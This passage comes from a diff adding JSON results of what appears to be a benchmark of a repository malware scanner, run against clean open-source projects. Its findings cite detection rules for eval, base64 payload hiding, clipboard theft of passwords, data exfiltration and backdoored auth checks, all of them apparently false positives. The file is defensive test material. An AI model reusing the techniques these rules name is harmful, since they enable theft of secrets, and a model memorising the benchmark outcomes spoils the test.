null, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "pkgs/core/examples/cdn/fp.js", + "line": null, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "pkgs/core/examples/cdn/legacy.js", + "line": null, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "pkgs/core/examples/cdn/legacyStrict.js", + "line": null, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "pkgs/core/examples/cdn/locale.js", + "line": null, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "pkgs/core/examples/cdn/locales.js", + "line": null, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "pkgs/core/scripts/build/package.sh", + "line": 221, + "description": "Suspicious file access detected: Destructive File Deletion" + } + ], + "filesScanned": 200, + "filesSkipped": 1703, + "treeTruncated": false, + "durationMs": 3523, + "error": "" + }, + { + "sampleId": "reference-ramda-ramda", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/ramda/ramda", + "immutableRef": "bcb320e60b5d91c958a6b02feb0bd8658d744298", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.09, + "safeToClone": true, + "rulesTriggered": [ + "OBFUSCATED_CODE" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "medium", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "dist/ramda.min.js", + "line": 1, + "description": "Extremely long line detected (53,748 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (53,748 chars, contains suspicious code)" + } + ], + "filesScanned": 200, + "filesSkipped": 513, + "treeTruncated": false, + "durationMs": 3255, + "error": "" + }, + { + "sampleId": "reference-sindresorhus-got", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/sindresorhus/got", + "immutableRef": "e3924aa1e53a6ca3eb93a43618ce532442a89b40", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 87, + "filesSkipped": 40, + "treeTruncated": false, + "durationMs": 3360, + "error": "" + }, + { + "sampleId": "reference-socketio-socket-io", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/socketio/socket.io", + "immutableRef": "d2d753fed4435015c2d83fe62e676b44e07fa3f7", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.27749999999999997, + "safeToClone": true, + "rulesTriggered": [ + "NETWORK_URL_SHORTENER", + "BACKDOOR_HARDCODED_AUTH", + "HARDCODED_SECRETS" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "NETWORK_URL_SHORTENER", + "file": "examples/create-react-app-example/src/index.js", + "line": 17, + "description": "Shortened URLs (bit.ly, tinyurl) in source code — obfuscates actual destination" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "NETWORK_URL_SHORTENER", + "file": "examples/create-react-app-example/src/serviceWorker.js", + "line": 11, + "description": "Shortened URLs (bit.ly, tinyurl) in source code — obfuscates actual destination" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "BACKDOOR_HARDCODED_AUTH", + "file": "examples/passport-example/cjs/index.js", + "line": 58, + "description": "Hardcoded password check — always-true backdoor condition in auth logic" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "BACKDOOR_HARDCODED_AUTH", + "file": "examples/passport-example/esm/index.js", + "line": 61, + "description": "Hardcoded password check — always-true backdoor condition in auth logic" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "examples/basic-crud-application/server-postgres-cluster/lib/index.js", + "line": 17, + "description": "Hardcoded credentials detected: Password" + } + ], + "filesScanned": 200, + "filesSkipped": 655, + "treeTruncated": false, + "durationMs": 3192, + "error": "" + }, + { + "sampleId": "reference-apollographql-apollo-client", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/apollographql/apollo-client", + "immutableRef": "c843c98a803d7d7f48f4da72080a61d9086dc8ad", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 853, + "treeTruncated": false, + "durationMs": 3651, + "error": "" + }, + { + "sampleId": "reference-tanstack-query", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/TanStack/query", + "immutableRef": "79d2384db5c8776680d5bfbe9b595618c066248b", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.15, + "safeToClone": true, + "rulesTriggered": [ + "HARDCODED_API_KEY" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "high", + "confidence": "medium", + "type": "MALWARE_SIGNATURE", + "rule": "HARDCODED_API_KEY", + "file": "examples/react/algolia/src/algolia.ts", + "line": 7, + "description": "Generic API key / secret key pattern assigned to a variable (obvious placeholders are downgraded by scanner context)" + } + ], + "filesScanned": 200, + "filesSkipped": 2151, + "treeTruncated": false, + "durationMs": 2969, + "error": "" + }, + { + "sampleId": "reference-testing-library-react-testing-library", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/testing-library/react-testing-library", + "immutableRef": "be9d81d91314c9f0bafaa363f70b409b4b31989c", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 36, + "filesSkipped": 31, + "treeTruncated": false, + "durationMs": 2270, + "error": "" + }, + { + "sampleId": "reference-prisma-prisma", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/prisma/prisma", + "immutableRef": "cda80a4488b7b551c36bf09ca2e8303ef9509da4", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.27749999999999997, + "safeToClone": true, + "rulesTriggered": [ + "TYPOSQUAT_PACKAGE", + "OBF_EVAL", + "HARDCODED_DB_CONNECTION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "unspecified", + "type": "TYPOSQUAT_PACKAGE", + "rule": "TYPOSQUAT_PACKAGE", + "file": "package.json", + "line": null, + "description": "Possible typosquat of \"prettier\": prettier2" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/cli/src/Generate.ts", + "line": 36, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "MALWARE_SIGNATURE", + "rule": "HARDCODED_DB_CONNECTION", + "file": "packages/cli/src/Init.ts", + "line": 193, + "description": "MongoDB or PostgreSQL connection string with credentials embedded" + } + ], + "filesScanned": 200, + "filesSkipped": 4471, + "treeTruncated": false, + "durationMs": 3593, + "error": "" + }, + { + "sampleId": "reference-tailwindlabs-tailwindcss", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/tailwindlabs/tailwindcss", + "immutableRef": "35a3e9c5159bea77af0d48f0c8849279211cc7e9", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 341, + "treeTruncated": false, + "durationMs": 3046, + "error": "" + }, + { + "sampleId": "reference-prettier-prettier", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/prettier/prettier", + "immutableRef": "41a8b99bb8d7d68c00d90d5b8fbaed20511d4cfd", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.0375, + "safeToClone": true, + "rulesTriggered": [ + "OBF_NEW_FUNCTION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "bin/prettier.cjs", + "line": 16, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "knip.config.js", + "line": 17, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "scripts/build/transform/transforms/transform-string-raw.js", + "line": 31, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + } + ], + "filesScanned": 200, + "filesSkipped": 9125, + "treeTruncated": false, + "durationMs": 3497, + "error": "" + }, + { + "sampleId": "reference-eslint-eslint", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/eslint/eslint", + "immutableRef": "c5963f74bfa82a5b7ccc0607dcdcc695b8c97a31", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.0375, + "safeToClone": true, + "rulesTriggered": [ + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "docs/src/assets/js/search.js", + "line": 186, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 2156, + "treeTruncated": false, + "durationMs": 3330, + "error": "" + }, + { + "sampleId": "reference-pnpm-pnpm", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/pnpm/pnpm", + "immutableRef": "0dd21df7457d2026f411f2c1a09104280b9b16e5", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.09, + "safeToClone": true, + "rulesTriggered": [ + "HARDCODED_SECRETS" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "medium", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "pnpm11/auth/commands/src/login.ts", + "line": null, + "description": "Hardcoded credentials detected: Password" + } + ], + "filesScanned": 200, + "filesSkipped": 4869, + "treeTruncated": false, + "durationMs": 3814, + "error": "" + }, + { + "sampleId": "noisy-denoland-deno", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/denoland/deno", + "immutableRef": "e5aed78415ded1213794bbf1ebbde1bf5cfa08b4", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.2175, + "safeToClone": true, + "rulesTriggered": [ + "OBFUSCATED_CODE", + "OBF_BASE64_HEAVY", + "OBF_EVAL", + "HARDCODED_SECRETS", + "NETWORK_COMMUNICATION", + "CODE_INTEGRITY_ISSUE" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "medium", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "cli/tools/doc/prism.js", + "line": 3, + "description": "Extremely long line detected (7,461 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 3 (7,461 chars, contains suspicious code), Line 8 (6,143 chars), Line 10 (5,138 chars, contains suspicious code)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "cli/tsc/dts/lib.es2020.intl.d.ts", + "line": 80, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "cli/tsc/dts/lib.es5.d.ts", + "line": 31, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "cli/tsc/dts/lib.webworker.d.ts", + "line": 1986, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": ".github/workflows/ci.ts", + "line": 758, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": ".github/workflows/promote_to_release.ts", + "line": 157, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "medium", + "confidence": "low", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "cli/tsc/dts/lib.deno.ns.d.ts", + "line": 5375, + "description": "Suspicious network communication detected: Hardcoded IP Address (3 occurrences)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "cli/tsc/dts/lib.deno_net.d.ts", + "line": 257, + "description": "Suspicious network communication detected: Hardcoded IP Address (5 occurrences)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "CODE_INTEGRITY_ISSUE", + "rule": "CODE_INTEGRITY_ISSUE", + "file": "cli/tools/doc/prism.js", + "line": null, + "description": "Minified/obfuscated code detected in source repository" + } + ], + "filesScanned": 200, + "filesSkipped": 14300, + "treeTruncated": false, + "durationMs": 5578, + "error": "" + }, + { + "sampleId": "noisy-oven-sh-bun", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/oven-sh/bun", + "immutableRef": "8f1a9540fdff25410506de76e0da2506d260c08f", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.18, + "safeToClone": true, + "rulesTriggered": [ + "OBFUSCATED_CODE", + "OBF_EVAL", + "HARDCODED_SECRETS", + "CODE_INTEGRITY_ISSUE" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "medium", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "bench/react-hello-world/react-hello-world.workerd.js", + "line": 16, + "description": "Extremely long line detected (36,141 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 16 (30,001 chars, contains suspicious code), Line 18 (6,437 chars), Line 23 (9,431 chars)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "bench/snippets/buffer-create.mjs", + "line": 17, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "bench/snippets/pbkdf2.mjs", + "line": 5, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "medium", + "confidence": "low", + "type": "CODE_INTEGRITY_ISSUE", + "rule": "CODE_INTEGRITY_ISSUE", + "file": "bench/react-hello-world/react-hello-world.workerd.js", + "line": null, + "description": "Minified/obfuscated code detected in source repository" + } + ], + "filesScanned": 200, + "filesSkipped": 17929, + "treeTruncated": false, + "durationMs": 4040, + "error": "" + }, + { + "sampleId": "noisy-tauri-apps-tauri", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/tauri-apps/tauri", + "immutableRef": "f5347cd70838c027040acb4a66733a2470f20ae4", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.2175, + "safeToClone": true, + "rulesTriggered": [ + "OBFUSCATED_CODE", + "SUSPICIOUS_FILE_ACCESS", + "HARDCODED_SECRETS" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "crates/tauri/scripts/bundle.global.js", + "line": 1, + "description": "Extremely long line detected (40,694 characters). Malicious code may be hidden far to the right. Affected: Line 1 (40,694 chars)" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": ".docker/cross/cmake.sh", + "line": 27, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": ".docker/cross/linux-image.sh", + "line": 173, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "packages/api/src/core.ts", + "line": 241, + "description": "Hardcoded credentials detected: Password" + } + ], + "filesScanned": 133, + "filesSkipped": 948, + "treeTruncated": false, + "durationMs": 3368, + "error": "" + }, + { + "sampleId": "noisy-puppeteer-puppeteer", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/puppeteer/puppeteer", + "immutableRef": "5f5f931a0f2bc64bfb30039c507d763ce044c263", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.1275, + "safeToClone": true, + "rulesTriggered": [ + "OBF_EVAL", + "EXFIL_CLIPBOARD", + "OBF_SETTIMEOUT_STRING" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/puppeteer-core/src/api/ElementHandle.ts", + "line": 463, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/puppeteer-core/src/api/Frame.ts", + "line": 624, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "MALWARE_SIGNATURE", + "rule": "EXFIL_CLIPBOARD", + "file": "packages/puppeteer-core/src/api/Input.ts", + "line": 333, + "description": "Reads clipboard content — can steal copied passwords, 2FA codes, crypto addresses" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/puppeteer-core/src/api/Page.ts", + "line": 1353, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_SETTIMEOUT_STRING", + "file": "packages/puppeteer-core/src/api/locators/locators.ts", + "line": null, + "description": "Passing a string to setTimeout/setInterval executes it as code (like eval). A common obfuscation technique: setTimeout(\"maliciousCode()\", 0)\n" + } + ], + "filesScanned": 200, + "filesSkipped": 2016, + "treeTruncated": false, + "durationMs": 4027, + "error": "" + }, + { + "sampleId": "noisy-microsoft-typescript", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/microsoft/TypeScript", + "immutableRef": "637d5746b70257028fb95aad32ddec6b26ab0a14", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.075, + "safeToClone": true, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "OBFUSCATED_CODE", + "OBF_EVAL", + "OBF_NEW_FUNCTION", + "NETWORK_COMMUNICATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/commandLineParser.ts", + "line": 1941, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/moduleNameResolver.ts", + "line": 79, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/parser.ts", + "line": 1042, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/program.ts", + "line": 227, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/resolutionCache.ts", + "line": 67, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "src/compiler/scanner.ts", + "line": 333, + "description": "Extremely long line detected (10,367 characters). Malicious code may be hidden far to the right. Affected: Line 333 (5,355 chars), Line 342 (8,908 chars), Line 344 (10,367 chars)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/transformers/classFields.ts", + "line": 1846, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/transformers/destructuring.ts", + "line": 142, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/transformers/es2015.ts", + "line": 571, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/types.ts", + "line": 4730, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/utilities.ts", + "line": 509, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/compiler/watchPublic.ts", + "line": 75, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "src/harness/fourslashImpl.ts", + "line": 785, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "src/harness/fourslashImpl.ts", + "line": 791, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "src/harness/fourslashInterfaceImpl.ts", + "line": 331, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "src/compiler/transformers/es2015.ts", + "line": 3702, + "description": "Suspicious network communication detected: Hardcoded IP Address (2 occurrences)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "src/compiler/utilities.ts", + "line": 6201, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + } + ], + "filesScanned": 200, + "filesSkipped": 53109, + "treeTruncated": true, + "durationMs": 7952, + "error": "" + }, + { + "sampleId": "noisy-npm-cli", + 